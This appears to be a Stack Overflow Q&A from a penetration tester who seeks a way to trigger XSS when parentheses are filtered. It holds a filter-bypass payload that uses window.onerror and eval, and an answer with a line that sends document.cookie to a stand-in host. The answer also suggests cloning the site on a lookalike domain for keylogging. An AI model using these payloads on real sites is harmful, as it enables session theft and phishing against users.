# Javascript alert without parenthesis

Tags: javascript, jquery, xss

I have found that Cross Site Scripting vulnerability in a client's application.

The problem is that the vulnerable parameter does not accept parenthesis. So something like alert(document.cookie) will be rejected because of parenthesis.

I can get XSS using alert `xss`
and I have tried the code below also failed the site reloading long time i think it's rejected

```
window.onerror=eval;throw '=1;alert\u0028document.location\u0029'
```

I tried from the link [parentheses alternatives in JS , if any?](https://stackoverflow.com/questions/40898632/parentheses-alternatives-in-js-if-any/40898704#40898704) 
But I failed. 
are there any alternatives ?

thank you

Comment: Possible https://stackoverflow.com/questions/40898632/parentheses-alternatives-in-js-if-any/40898704#40898704

Comment: i was tried `url encode` but didn't work, any idea ?

Comment: yeah i got that code from that question didn't work on that site

Answer (score 0):

Is there a reason that an `alert` is necessary? I understand that it is common for demonstrating a proof of concept, but would simply having a redirect would be sufficient?

For example:

`document.location="https://example.com?cookie="+document.cookie`

It's important for pentesters to remember that XSS is not actually about popping alert boxes, but about executing arbitrary JavaScript. What would a real attacker do with the access your XSS allows?

Imagine setting up an identical site on a similar domain as your client's, and redirecting the user there... except now you don't need XSS and can log key strokes, ask them to download files, attempt browser exploits, etc.